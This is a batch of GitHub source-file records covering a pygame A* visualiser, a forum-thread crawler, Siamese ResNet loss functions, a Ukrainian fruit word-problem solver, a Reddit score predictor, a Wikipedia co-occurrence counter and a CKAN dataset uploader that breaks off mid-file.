== pygame.QUIT:\n exiting = True\n\n # Visualizing the final path\n for index in range(len(path)-1):\n node = path[index]\n action = node.valid_actions[path[index+1]]\n robot.drawActionSet(node.i, node.j, node.theta, action[0], action[1], black)\n\n\n clock.tick(2000)\n pygame.display.flip()\n exiting = True\npygame.quit()\n","repo_name":"AdityaVaradaraj/A_Star_Project3_Phase_2","sub_path":"part_1/a_star.py","file_name":"a_star.py","file_ext":"py","file_size_in_byte":10546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"160645430","text":"import requests\r\nfrom lxml import etree\r\nfrom selenium import webdriver\r\nimport json\r\nimport re\r\nimport pandas as pd\r\nfrom pandas import ExcelWriter\r\nimport time\r\nimport openpyxl\r\nfrom openpyxl import load_workbook\r\nimport os.path\r\nimport sqlite3\r\n\r\ndef getPageNum(url, driver):\r\n\r\n # Get the Post\r\n driver.get(url)\r\n Page = driver.page_source\r\n Tree = etree.HTML(Page)\r\n DataNode = ''.join(Tree.xpath('//script/text()'))\r\n Data = re.search(r'window.__PRELOADED_STATE__ = {.*}$', DataNode).group()\r\n ParsedData = ''.join(re.search(r'{.*}', Data).group())\r\n\r\n # Process the JSON data\r\n j = json.loads(ParsedData) # print(j['topic']) # print(j['thread']) # print(j['thread']['replies'])\r\n\r\n return j['thread']['totalPage']\r\n\r\ndef fetch(url,PageNum,driver, ThreadID):\r\n\r\n Columns = ['ReplyID', 'Forum', 'Index', 'AuthorID', 'AuthorName', 'AuthorGender', 'Content', 'ReplyDate', 'ThreadID']\r\n Thread = pd.DataFrame(columns=Columns, dtype=object)\r\n Database = sqlite3.connect('Thread.sqlite3')\r\n\r\n for i in range(1,PageNum+1):\r\n\r\n # Get the Post\r\n print(\"Getting:\" + url + \"&page=\" + str(i))\r\n driver.get(url + \"&page=\" + str(i))\r\n time.sleep(2)\r\n\r\n Page = driver.page_source\r\n Tree = etree.HTML(Page)\r\n DataNode = ''.join(Tree.xpath('//script/text()'))\r\n Data = re.search(r'window.__PRELOADED_STATE__ = {.*}$', DataNode).group()\r\n ParsedData = ''.join(re.search(r'{.*}', Data).group())\r\n\r\n # Process the JSON data\r\n j = json.loads(ParsedData) # print(j['topic']) # print(j['thread']) # print(j['thread']['replies'])\r\n for Post in j['thread']['replies']:\r\n Post['content'] = re.sub('>', '>', Post['content'])\r\n Post['content'] = re.sub('"', '\\\\\"', Post['content'])\r\n Post['content'] = re.sub('\\r
', '\\n', Post['content'])\r\n Post['content'] = re.sub('
', '\\n', Post['content'])\r\n Post['content'] = \"\" + Post['content'] + \"\"\r\n Tree = etree.HTML(Post['content'])\r\n Post['content'] = ''.join(Tree.xpath('//body/text()'))\r\n Post['content'] = re.sub('<.*?>', '', Post['content'])\r\n Post['content'] = re.sub('[;\\n\\\\.,,。]', ' ', Post['content'])\r\n Post['content'] = re.sub(' {2,}', ' ', Post['content'])\r\n Post['content'] = Post['content'].strip(' ');\r\n\r\n for Post in j['thread']['replies']:\r\n if len(Post['content']) > 1:\r\n Post['ThreadID'] = ThreadID\r\n Record = pd.DataFrame([list(Post.values())], columns=Columns, dtype=object)\r\n ExportToSQLite(Database, Record)\r\n Thread = Thread.append(Record)\r\n\r\n Thread.set_index('Index', inplace=True)\r\n Thread.reset_index(drop=True, inplace=True)\r\n Thread.index.name = 'Index'\r\n\r\n print(Thread.to_string())\r\n print(\"Complete\" + \":\" + url)\r\n\r\n return Thread\r\n\r\ndef ExportToSQLite(Database, Record):\r\n try:\r\n Record.to_sql('Thread', Database, index=False, if_exists='append')\r\n except sqlite3.IntegrityError:\r\n pass\r\n\r\ndef ExportToCSV(Thread):\r\n if os.path.isfile('Thread.csv'):\r\n Thread.to_csv('Thread.csv', encoding='utf_8_sig', mode='a', header=False)\r\n else:\r\n Thread.to_csv('Thread.csv', encoding='utf_8_sig')\r\n\r\ndef ExportToExcel(Thread): # Not in Used\r\n\r\n writer = ExcelWriter('Thread.xlsx')\r\n\r\n if os.path.isfile('Thread.xlsx'):\r\n book = load_workbook('Thread.xlsx')\r\n if ThreadID in book.sheetnames:\r\n stn = book.get_sheet_by_name(ThreadID)\r\n book.remove_sheet(stn)\r\n writer.book = book\r\n writer.sheets = dict((ws.title, ws) for ws in book.worksheets)\r\n\r\n Thread.to_excel(writer, 'Sheet')\r\n writer.save()\r\n\r\ndef main():\r\n\r\n # Disable Browser Pop up\r\n Option = webdriver.ChromeOptions()\r\n Option.add_argument('headless')\r\n\r\n # Disable Image\r\n prefs = {\"profile.managed_default_content_settings.images\": 2}\r\n Option.add_experimental_option(\"prefs\", prefs)\r\n\r\n # Get the Javascript Website\r\n driver = webdriver.Chrome(executable_path='C:\\Chrome\\chromedriver.exe', chrome_options=Option)\r\n\r\n # Fetch\r\n url = \"https://hkug.arukascloud.io/topics/2/6975952?forum=HKG\"\r\n PageNum = getPageNum(url, driver)\r\n Thread = fetch(url,PageNum,driver,str(873403))\r\n\r\n # Closed the Driver\r\n driver.close();\r\n\r\nif __name__ == '__main__': # Function inside this block will not be Executed\r\n main();","repo_name":"Nelson5923/Final-Year-Project","sub_path":"ForumCrawler/FetchSingleThread.py","file_name":"FetchSingleThread.py","file_ext":"py","file_size_in_byte":4541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8184358601","text":"import pdb\n\nimport numpy as np\nimport torch\nfrom torch import nn\n\nfrom tbv.models.resnet_factory import ResNetConvBackbone\n\n\ndef contrastive_loss(y_c: torch.Tensor, pred_dists: torch.Tensor, margin: int = 1) -> torch.Tensor:\n \"\"\"\n Compute the similarities in the separation loss (4) by\n computing average pairwise similarities between points\n in the embedding space.\n element-wise square, element-wise maximum of two tensors.\n Contrastive loss also defined in:\n -\t\"Dimensionality Reduction by Learning an Invariant Mapping\"\n by Raia Hadsell, Sumit Chopra, Yann LeCun\n Args:\n y_c: Indicates if pairs share the same semantic class label or not\n pred_dists: Distances in the embeddding space between pairs.\n\n Returns:\n tensor representing contrastive loss values.\n \"\"\"\n N = pred_dists.shape[0]\n\n # corresponds to \"d\" in the paper. If same class, pull together.\n # Zero loss if all same-class examples have zero distance between them.\n pull_losses = y_c * torch.pow(pred_dists, 2)\n # corresponds to \"k\" in the paper. If different class, push apart more than margin\n # if semantically different examples have distances are in [0,margin], then there WILL be loss\n zero = torch.zeros(N)\n device = y_c.device\n zero = zero.to(device)\n # if pred_dists for non-similar classes are <1, then incur loss >0.\n clamped_dists = torch.max(margin - pred_dists, zero)\n push_losses = (1 - y_c) * torch.pow(clamped_dists, 2)\n return torch.mean(pull_losses + push_losses)\n\n\ndef paired_euclidean_distance(X: torch.Tensor, Y: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Compute the distance in the semantic alignment loss (3) by\n computing average pairwise distances between *already paired*\n points in the embedding space.\n Note this is NOT computed between all possible pairs. Rather, we\n compare i'th vector of X vs. i'th vector of Y (i == j always).\n\n Args:\n X: Pytorch tensor of shape (N,D) representing N embeddings of dim D\n Y: Pytorch tensor of shape (N,D) representing N embeddings of dim D\n Returns:\n dists: Pytorch tensor of shape (N,) representing distances between fixed pairs\n \"\"\"\n device = X.device\n N, D = X.shape\n assert Y.shape == X.shape\n eps = 1e-08 * torch.ones((N, 1))\n eps = eps.to(device) # make sure in same memory (CPU or CUDA)\n # compare i'th vector of x vs. i'th vector of y (i == j always)\n diff = torch.pow(X - Y, 2)\n\n affinities = torch.sum(diff, dim=1, keepdim=True)\n # clamp the affinities to be > 1e-8 ?? Unclear why the authors do this...\n affinities = torch.max(affinities, eps)\n return torch.sqrt(affinities)\n\n\ndef smooth_triplet_loss(embeddings: torch.Tensor, triplet_idxs: np.ndarray) -> torch.Tensor:\n \"\"\"\n N. N. Vo and J. Hays. Localizing and orienting street views\n using overhead imagery. ECCV 16.\n\n K. Sohn. Improved deep metric learning with multi-class npair\n loss objective. NIPS, 2016\n\n A. Hermans, L. Beyer, and B. Leibe. In defense of the\n triplet loss for person re-identification. arXiv, 2017.\n\n Ref:\n https://arxiv.org/pdf/1803.03310.pdf\n https://github.com/lugiavn/generalization-dml/blob/master/nams.py\n\n d is the squared Euclidean distance (negative dot\n product can also be used instead).\n\n Normalize the image feature to have unit magnitude and\n then scale it by 4,\n \"\"\"\n # dist from anchors to negatives\n an_dists = paired_euclidean_dists(embeddings, a, n)\n # dist from anchors to positives\n ap_dists = pair_dists(embeddings, a, p)\n return torch.log(1 + torch.exp(an_dists - ap_dists))\n\n\ndef test_smooth_triplet_loss():\n \"\"\" \"\"\"\n pass\n\n\nclass SiameseTripletResnet(nn.Module):\n def __init__(self, num_layers: int, pretrained: bool) -> None:\n \"\"\" \"\"\"\n super(SiameseTripletResnet, self).__init__()\n self.net = ResNetConvBackbone(num_layers, pretrained)\n\n def forward(self, x_a: torch.Tensor, x_p: torch.Tensor, x_n: torch.Tensor) -> torch.Tensor:\n \"\"\"anchor, positive, negative\"\"\"\n pdb.set_trace()\n\n x_a = self.net(x_a)\n x_p = self.net(x_p)\n x_n = self.net(x_n)\n\n loss = smooth_triplet_loss()\n\n # do some inference here, based on some thresholded distance\n output = x_a, x_p, x_n\n return output, loss\n\n\nclass SiameseContrastiveResnet(nn.Module):\n def __init__(self, num_layers: int, pretrained: bool) -> None:\n \"\"\" \"\"\"\n super(SiameseContrastiveResnet, self).__init__()\n self.net = ResNetConvBackbone(num_layers, pretrained)\n\n def forward(self, x: torch.Tensor, xstar: torch.Tensor, y_c: torch.Tensor):\n \"\"\"y_c: whether they belong to the same class\n\n Args:\n x: NCHW tensor\n xstar: NCHW tensor\n y_c: (N,) tensor\n \"\"\"\n # get back (N,512) embeddings\n x = self.net(x)\n xstar = self.net(xstar)\n\n # TODO: should we normalize the embeddings first?\n\n # pass in the corresponding embeddings\n # inputs must be (N,D)\n pred_dists = paired_euclidean_distance(x, xstar)\n loss = contrastive_loss(y_c, pred_dists)\n\n return pred_dists, loss\n","repo_name":"johnwlambert/tbv","sub_path":"tbv/models/siamese_resnet.py","file_name":"siamese_resnet.py","file_ext":"py","file_size_in_byte":5287,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"53"} +{"seq_id":"10988616417","text":"import nltk\nfrom difflib import get_close_matches\n\ntest = \"На столі було. Скільки всього фруктів залишилось на столі?\"\nfruits = ['апельсин', 'яблуко', 'груша', 'мандарин', 'банан']\nactions_plus = [\"є\", \"було\", \"поклав\"]\naction = [\"залишилось\"]\nactions_minus = [\"з'їв\", \"забрав\"]\n\n\nclass SimpleAI:\n def __init__(self):\n self.num_of_fruits_start = 0\n self.num_of_fruits = 0\n self.stop_word = 'Скільки'\n self.conditions = {}\n self.question = []\n self.start_state = {}\n self.response = ''\n self.error_case = 0\n\n def sentence_analyzer(self, text):\n sentences = nltk.sent_tokenize(text)\n self.starting_handler(sentences[0])\n for sentence in sentences[1:]:\n if sentence.startswith(self.stop_word):\n self.question_handler(sentence)\n else:\n w = nltk.word_tokenize(sentence)\n self.action_analyzer(w)\n if len(self.question) == 0:\n self.error_case = 1\n self.error_handler()\n elif len(self.conditions) == 0:\n self.error_case = 2\n self.error_handler()\n return self.response\n\n def question_handler(self, sentence):\n words = nltk.word_tokenize(sentence)\n for i in words:\n if len(get_close_matches(i, fruits)) > 0:\n self.question.append(i)\n if i in action or i in actions_plus or i in actions_minus:\n self.question.append(i)\n if i == 'фруктів':\n self.question.append(i)\n self.final_constructor(self.question)\n\n def starting_handler(self, sentence):\n description = nltk.word_tokenize(sentence)\n for word in description:\n f_m = get_close_matches(word, fruits)\n if len(f_m) > 0:\n num_or_not = description[description.index(word) - 1]\n try:\n self.conditions[f_m[0]] = int(num_or_not)\n self.start_state[f_m[0]] = int(num_or_not)\n self.num_of_fruits_start += int(num_or_not)\n except ValueError:\n pass\n\n def action_analyzer(self, sentence):\n w_m = []\n for word in sentence:\n f_m = get_close_matches(word, fruits)\n a_m = get_close_matches(word, actions_minus)\n if len(a_m) > 0:\n w_m.append(a_m)\n a_p = get_close_matches(word, actions_plus)\n if len(a_p) > 0:\n w_m.append(a_p)\n if len(f_m) > 0:\n num_or_not = sentence[sentence.index(word) - 1]\n try:\n if w_m[-1][0] in actions_minus:\n self.conditions[f_m[0]] -= int(num_or_not)\n elif w_m[-1][0] in actions_plus:\n self.conditions[f_m[0]] += int(num_or_not)\n except ValueError:\n pass\n self.num_of_fruits = self.num_of_fruits_start - sum(self.conditions.values())\n return w_m\n\n def error_handler(self):\n if self.error_case == 1:\n self.response = 'У задачі повинні бути питання, які починаються зі слова \"Скільки\".'\n elif self.error_case == 2:\n self.response = 'У задачі відсутня умова з фруктами. Повинна бути присутня умова про хлопчика,' \\\n ' який виконує дії з фруктами.'\n print(self.response)\n\n def final_constructor(self, question_list):\n final = ''\n if len(get_close_matches(self.question[0], fruits)) > 0 or self.question[0] == 'фруктів':\n self.question.reverse()\n for word in question_list:\n if action[0] in self.question:\n if len(get_close_matches(word, fruits)) > 0:\n final = 'На столі залишилось {} {}.'.format(self.conditions[get_close_matches(word, fruits)[0]],\n word)\n elif word == 'фруктів':\n final = 'На столі залишилось {} {}.'.format(self.num_of_fruits_start - self.num_of_fruits, word)\n elif self.question[0] in actions_minus:\n if len(get_close_matches(word, fruits)) > 0:\n final = 'Хлопчик {} {} {}.'.format(self.question[0],\n self.start_state[get_close_matches(word, fruits)[0]]\n - self.conditions[get_close_matches(word, fruits)[0]], word)\n elif word == 'фруктів':\n final = 'Хлопчик {} {} {}'.format(self.question[0], self.num_of_fruits, word)\n elif self.question[0] in actions_plus:\n if len(get_close_matches(word, fruits)) > 0:\n final = 'Хлопчик {} {} {}.'.format(self.question[0],\n self.conditions[get_close_matches(word, fruits)[0]\n - self.start_state[get_close_matches(word, fruits)[0]]], word)\n elif word == 'фруктів':\n final = 'Хлопчик {} {} {}.'.format(self.question[0],\n sum(self.conditions.values()) - sum(self.start_state.values()),\n word)\n\n self.response = final\n if len(self.conditions) != 0:\n print(self.response)\n return final\n\n\ns = SimpleAI()\ns.sentence_analyzer(test)\n","repo_name":"johnnyblame/simpleAI","sub_path":"AI.py","file_name":"AI.py","file_ext":"py","file_size_in_byte":5896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13362600491","text":"\nimport pandas as pd\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer \nfrom sklearn.preprocessing import StandardScaler\nfrom scipy.sparse import hstack\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import Ridge,LinearRegression\nfrom sklearn.metrics import r2_score,accuracy_score\nimport joblib\nfrom VADdet import analyze\nimport numpy as np\n\npath = \"../files/new_train_test/new_tTrain_data.csv\"\n\ndata = pd.read_csv(path)\ncalculated = pd.DataFrame(columns=['actual_score','hour_pred'])\ndata_removed = data.drop(['redditor','type','text','proc_text','proc_title','genre','absolute_words_ratio','neg_log_prob_aw_ratio'],axis = 1)\n\ndata_removed = data_removed.dropna(subset = ['title','subreddit','datetime','valence','arousal','dominance','hour'])\n\n\ntrain_x ,y = data_removed.drop('score',axis = 1), data_removed[['score']]\n\ntfidf_subreddit = TfidfVectorizer(ngram_range=(1, 1), max_features=None)\nsubreddit_sparse = tfidf_subreddit.fit_transform(train_x['subreddit'])\n\n\n#changing ngram range \ntfidf_title = TfidfVectorizer(ngram_range=(2, 5), max_features=None)\ntitle_sparse = tfidf_title.fit_transform(train_x['title'])\n\nhour = train_x[['hour']]\nvalence = train_x[['valence']]\narousal = train_x[['arousal']]\ndominance = train_x[['dominance']]\n\nscaler = StandardScaler()\nscaled_date = scaler.fit_transform(hour)\nscaled_val = np.hstack([scaled_date,valence,arousal,dominance])\n\nml_model = joblib.load(\"mlp_hour.joblib\")\n\nhour_clock = [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24]\ntime = [[10]]\nsubredddit = [\"books\"]\ntitle = \"Pizza Hut's BOOK IT! summer reading camp is back and we have so much nostalgia\"\nmode = \"mean\"\nV = A = D = 0\nV,A,D = analyze(title,mode)\nV/=10\nA/=10\nD/=10\n\nsub_sparse = tfidf_subreddit.transform(subredddit)\ntit_sparse = tfidf_title.transform([title])\ntime_sparse = scaler.transform(time)\n\npred_sparse = hstack([tit_sparse,sub_sparse,time_sparse])\nresult = ml_model.predict(pred_sparse)\nfor hour in hour_clock:\n if hour != time:\n time_sparse = scaler.transform([[hour]])\n vad_sparse = np.hstack([time_sparse,[[V]],[[A]],[[D]]])\n pred_sparse = hstack([tit_sparse,sub_sparse,vad_sparse])\n test_res = ml_model.predict(pred_sparse)\n if test_res>result:\n print(f\"\\nYOU WOULD GET {test_res} UPVOTES IF YOU POSTED AT {hour}\")\n\nprint(result)\n","repo_name":"Neel-G-png/reddit-post-outreach-prediction","sub_path":"hour_model/check_hour_prediction.py","file_name":"check_hour_prediction.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"1463861618","text":"'''\nminimum cost of shortest path\n\n2 8 6\n3 5 4\n4 3 2\n'''\n\nimport cv2\nimport numpy as np\n\nimg = np.array([[2,8,6],[3,5,4],[4,3,2]])\n\nh = 3\nw = 3\n\ncost = np.zeros([h,w,1],np.uint8)\n\nfor i in range(0,h):\n\tfor j in range(0,w):\n\t\t\tif (i==0 or j==0):\n\t\t\t\tcost[i][j] = img[i][j]\n\t\t\telse:\n\t\t\t\tcost[i][j] = min(cost[i-1][j-1],cost[i][j-1],cost[i-1][j]) + img[i][j]\nprint(cost[h-1][w-1])","repo_name":"ShrayaniMondal/ImageProcessing","sub_path":"Prog31/prg31_matrix.py","file_name":"prg31_matrix.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"10669017408","text":"\"\"\"\nThis script should be called with parameters specifying which chunk of wikipedia to process and size of chunk \n(number of articles to process).\nGiven the chunk number, this script iterates through each wikipedia article in the chunk, dependency parses\neach sentence, and accumulates the co-occurence counts between word pairs (adjective-noun and verb-object) and\ncontext words. This requires the stanford coreNLP server to be running locally on port 9000, and requires\naccess to a file containg the dictionary of words we consider (one word per line). It also requires a compressed\ndump of wikipedia in .bz2 format.\n\nBe sure to appropriately specify the file paths, all of which are listed after the command-line arguments are read.\n\"\"\"\nimport sys\nimport os\nimport numpy as np\nfrom collections import Counter, defaultdict\nimport pickle\nfrom nltk.parse.corenlp import CoreNLPDependencyParser as dep_parser\nimport gensim\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nimport wikicorpus_sentence as ws\n\ndef main():\n # read command-line arguments\n for arg in sys.argv:\n if arg.startswith('--job='):\n job_iter = int(arg.split('--job=')[1])\n if arg.startswith('--num_articles='):\n num_articles = int(arg.split('--num_articles=')[1])\n\n # SPECIFY THESE FILE PATHS APPROPRIATELY\n path_to_coreNLP_server = 'http://localhost:{}'.format(9000) # specify the port where CoreNLP server is running\n compressed_wiki = '~/enwiki-latest-pages-articles.xml.bz2' # path to the compressed wiki dump\n vocab_file = \"~/research/datasets/rw_vocab_no_stopwords.txt\" # location of the vocab file (one word (string) per line)\n save_path_triple_an = \"triple_counts_an_{}.pkl\".format(job) # save path for adjective-noun-context_word triple counts\n save_path_wordpair_an = \"wordpair_counts_an_{}.pkl\".format(job) # save path for adjective-noun pair counts\n save_path_triple_vo = \"triple_counts_vo_{}.pkl\".format(job) # save path for verb-object-context_word triple counts\n save_path_wordpair_vo = \"wordpair_counts_vo_{}.pkl\".format(job) # save path for verb-object pair counts \n\n window_size = 5 # radius of context window (but contexts don't cross sentence boundaries)\n \n # connect to CoreNLP server \n dependency_parser = dep_parser(url=path_to_coreNLP_server)\n \n # instantiate wikipedia iterator\n wiki = ws.WikiCorpusBySentence(compressed_wiki, dictionary={})\n articles = wiki.get_texts()\n \n # create mapping from word (string) to index (int), using vocab file\n vocab = []\n with open(vocab_file,\"r\") as f:\n for line in f:\n vocab.append(line.strip(\"\\n\"))\n vocab_dict = defaultdict(lambda : -1) # this will return index -1 if key not found\n for i, w in enumerate(vocab):\n vocab_dict[w] = i\n \n # initialize objects that will keep track of co-occurence counts for both types of syntactic wordpairs\n triple_counts_an = Counter()\n wordpair_counts_an = Counter()\n triple_counts_vo = Counter()\n wordpair_counts_vo = Counter()\n \n # iterate to the correct chunk\n skip = (job-1)*num_articles\n for i in range(skip): \n a = next(articles)\n \n # process each article in the chunk \n for art_num in range(skip,skip+num_articles):\n if art_num % int(num_articles / 100) == 0 and art_num > 0:\n print(\"Just hit article {} out of {} ({}%)\".format(art_num, skip+num_articles, 100*(art_num-skip) / num_articles))\n print(\"Number of triples: {}, {}\".format(len(triple_counts_an),len(triple_counts_vo)))\n \n # save every 500 articles\n\n if art_num % 500 == 0 and art_num > 0:\n with open(save_path_triple_an, \"wb\") as f:\n pickle.dump(triple_counts_an,f)\n with open(save_path_wordpair_an, \"wb\") as f:\n pickle.dump(wordpair_counts_an,f)\n with open(save_path_triple_vo, \"wb\") as f:\n pickle.dump(triple_counts_vo,f)\n with open(save_path_wordpair_vo, \"wb\") as f:\n pickle.dump(wordpair_counts_vo,f)\n \n art = next(articles)\n for snt_num,sent in enumerate(art):\n if len(sent) == 0: # skip over empty sentences...\n continue\n for r in range(0,len(sent),150): # process by chunks of 150 words, since the tagger has memory issues if too big\n text_chunk = sent[r:r+150]\n \n try:\n dep = next(dependency_parser.parse(text_chunk)) # dependency parse the chunk\n except:\n print(\"{}\".format(len(text_chunk)))\n continue\n for i in range(len(text_chunk)): # go through each word in the chunk\n dep_dict = dep.get_by_address(i+1)\n head = vocab_dict[dep_dict[\"word\"]]\n if dep_dict[\"tag\"] is None:\n continue\n if (dep_dict[\"tag\"][:2] not in [\"NN\",\"VB\"]) or (head == -1): # if it's not a noun or verb, or not in vocab, skip it\n continue\n\n for ind in dep_dict[\"deps\"][\"amod\"]: # get indices of all dependent adjectives if head is noun\n adj = vocab_dict[dep.get_by_address(ind)[\"word\"]]\n if adj == -1: # if adjective not in dictionary, skip over it\n continue\n wordpair_counts_an[(adj,head)] += 1 # increment the adjective-noun wordpair count\n\n # get context words within 5 words of noun (excluding the dependent adjective)\n if ind -1: # if the context word is in vocab, increment triple count\n triple_counts_an[(adj,head,context_word)] += 1\n for k in range(i+1,min(len(sent),i+1+window_size)):\n context_word = vocab_dict[dep.get_by_address(k+1)[\"word\"]]\n if context_word > -1:\n triple_counts_an[(adj,head,context_word)] += 1\n else: # if adjective occurs after noun\n for k in range(max(0,i-window_size),i):\n context_word = vocab_dict[dep.get_by_address(k+1)[\"word\"]]\n if context_word > -1:\n triple_counts_an[(adj,head,context_word)] += 1\n for k in range(i+1,min(len(sent),i+2+window_size)):\n if k+1 != ind:\n context_word = vocab_dict[dep.get_by_address(k+1)[\"word\"]]\n if context_word > -1: # if the context word is in vocab, increment triple count\n triple_counts_an[(adj,head,context_word)] += 1\n\n for ind in dep_dict[\"deps\"][\"dobj\"]: # get indices of all direct objects if head is verb\n obj = vocab_dict[dep.get_by_address(ind)[\"word\"]]\n if obj == -1: # if adjective not in dictionary, skip over it\n continue\n wordpair_counts_vo[(head,obj)] += 1 # increment the adjective-noun wordpair count\n\n # get context words within 5 words of verb (excluding the dependent object)\n if ind -1: # if the context word is in vocab, increment triple count\n triple_counts_vo[(head,obj,context_word)] += 1\n for k in range(i+1,min(len(sent),i+1+window_size)):\n context_word = vocab_dict[dep.get_by_address(k+1)[\"word\"]]\n if context_word > -1:\n triple_counts_vo[(head,obj,context_word)] += 1\n else: # if object occurs after head \n for k in range(max(0,i-window_size),i):\n context_word = vocab_dict[dep.get_by_address(k+1)[\"word\"]]\n if context_word > -1:\n triple_counts_vo[(head,obj,context_word)] += 1\n for k in range(i+1,min(len(sent),i+2+window_size)):\n if k+1 != ind:\n context_word = vocab_dict[dep.get_by_address(k+1)[\"word\"]]\n if context_word > -1: # if the context word is in vocab, increment triple count\n triple_counts_vo[(head,obj,context_word)] += 1\n # save the counters\n with open(save_path_triple_an, \"wb\") as f:\n pickle.dump(triple_counts_an,f)\n with open(save_path_wordpair_an, \"wb\") as f:\n pickle.dump(wordpair_counts_an,f)\n with open(save_path_triple_vo, \"wb\") as f:\n pickle.dump(triple_counts_vo,f)\n with open(save_path_wordpair_vo, \"wb\") as f:\n pickle.dump(wordpair_counts_vo,f)\n \nif __name__ == '__main__':\n main()\n","repo_name":"abefrandsen/syntactic-rand-walk","sub_path":"triple_counts.py","file_name":"triple_counts.py","file_ext":"py","file_size_in_byte":9881,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"34223892118","text":"import csv\nimport getopt\nimport json\nimport pprint\nimport re\nimport os\nimport requests\nimport sys\nimport time\n\nfrom cache import settings\n\n\nclass AddDataset:\n def __init__(self):\n self.tags = {\n 'timestamp': '',\n 'entered_by': '',\n 'dataset_name': '',\n 'data_owner': '',\n 'category1': '',\n 'category2': '',\n 'category_notes': '',\n 'source_of_information': '',\n 'source_weblink': '',\n 'dataset_content': '',\n 'geographic_coverage': '',\n 'geographic_units': '',\n 'geography_notes': '',\n 'time_period_from': '',\n 'time_period_to': '',\n 'time_frequency': '',\n 'time_notes': '',\n 'data_type': '',\n 'data_type_notes': '',\n 'data_quality': '',\n 'data_access': '',\n 'data_owner_attitude_to_research_use': '',\n 'other_notes': ''\n }\n\n def convert(self, name):\n s1 = re.sub('(.)([A-Z][a-z]+)', r'\\1_\\2', name)\n return re.sub('([a-z0-9])([A-Z])', r'\\1_\\2', s1).lower().replace(' ', '_')\n\n def add_dataset(self, metadata, tags):\n description_keys = [\n 'category_notes',\n 'dataset_content',\n 'source_-_weblink',\n 'time_notes',\n 'data_type_notes',\n 'data_quality',\n 'data_access'\n ]\n\n description = ''\n extras = []\n tags_cleaned = {}\n\n for key, value in tags.items():\n print('converting', key, self.convert(key), value)\n if value:\n extras.append({\n 'key': self.convert(key),\n 'value': value\n })\n tags_cleaned[self.convert(key)] = value\n\n for description_key in description_keys:\n if description_key in tags_cleaned:\n description += '\\n\\n' + tags_cleaned[description_key]\n description = description.strip()\n\n # \\x2D - minus\n # \\x20 space\n # \\x55 dash\n # \\x137 underscore\n # TODO add allowed chars back into this regex\n\n dataset_dict = {\n 'name': re.sub(\n r'[^\\x61-\\x7A]|\\x40|\\x55|\\x137', r'',\n tags_cleaned['dataset_name'].lower()\n ),\n 'owner_org': settings.ckan_org_name,\n\n \"license_title\": None,\n \"maintainer\": None,\n \"private\": False,\n \"maintainer_email\": None,\n \"num_tags\": 0,\n \"author\": None,\n \"author_email\": None,\n \"state\": \"active\",\n \"version\": None,\n \"type\": \"dataset\",\n \"resources\": [\n ],\n \"num_resources\": 0,\n # \"tags\": [tags],\n \"groups\": [\n ],\n \"license_id\": None,\n \"isopen\": None,\n \"url\": None,\n \"notes\": description,\n \"extras\": extras,\n \"title\": tags_cleaned['dataset_name'],\n }\n\n # Make the HTTP request.\n response = requests.post(\n settings.ckan_url + '/api/action/package_create',\n headers={\n 'Authorization': settings.ckan_api_key,\n 'content-type': 'application/json'\n },\n data=json.dumps(dataset_dict))\n print(response.status_code)\n print(response.reason)\n print(response.content)\n print(response.text)\n\n response_dict = response.json()\n # print(response_dict)\n\n # package_create returns the created package as its result.\n # created_package = response_dict['result']\n # pprint.pprint(created_package)\n\n dataset_name = ''\n try:\n print('Added', response_dict['result']['name'])\n pprint.pformat(response_dict)\n dataset_name = response_dict['result']['name']\n\n except:\n dataset_name = re.sub(\n r'[^\\x61-\\x7A]|\\x40|\\x55|\\x137', r'',\n tags_cleaned['dataset_name'].lower().replace(' ', '-')\n )\n\n if tags_cleaned['source_-_weblink']:\n for url in tags_cleaned['source_-_weblink'].split('\\n'):\n url = url.strip()\n if ' ' not in url:\n self.add_resource(\n \"Source - weblink\",\n dataset_name,\n None,\n url\n )\n\n return response.json()\n\n def add_resource(self, resource_name, dataset_name, filepath, url):\n data = json.dumps(\n {\n \"package_id\": dataset_name,\n \"url\": url,\n \"name\": resource_name,\n \"format\": \"text/html\"\n })\n print('\\n\\n', data, '\\n\\n')\n\n response = requests.post(\n settings.ckan_url + '/api/action/resource_create',\n data=data,\n headers={\n \"X-CKAN-API-Key\": settings.ckan_api_key,\n 'content-type': 'application/json'\n }\n )\n print(response.text)\n\n def add_csv_dataset(self, csv_filepath, limit=None):\n with open(csv_filepath, 'r', encoding=\"latin-1\") as csv_file:\n dialect = csv.Sniffer().sniff(csv_file.read(1024))\n csv_file.seek(0)\n print('dialect', dialect)\n dr = csv.DictReader(csv_file)\n print(dr.fieldnames)\n\n count = 0\n for row in dr:\n print('Waiting for a second')\n time.sleep(1)\n count += 1\n if limit and count > limit:\n break\n ad.add_dataset({}, row)\n\n\nif __name__ == '__main__':\n\n ad = AddDataset()\n # for arg in sys.argv:\n # print(arg)\n\n inputfile = './metadata_hidden.csv'\n outputfile = ''\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"hi:o:\", [\"ifile=\", \"ofile=\"])\n print('OPTS ARGS', opts, args)\n except getopt.GetoptError as e1:\n print(e1)\n print('test.py -i -o ')\n sys.exit(2)\n\n for opt, arg in opts:\n if opt == '-h':\n print('test.py -i -o ')\n sys.exit()\n elif opt in (\"-i\", \"--ifile\"):\n inputfile = arg\n elif opt in (\"-o\", \"--ofile\"):\n outputfile = arg\n if os.path.isfile(inputfile):\n print('Input file is ', inputfile)\n\n ad.add_csv_dataset(inputfile, limit=None)\n else:\n print('\\nInput file {} missing or unavailable'.format(inputfile))\n\n exit()\n\n # tags = {\n # 'timestamp': 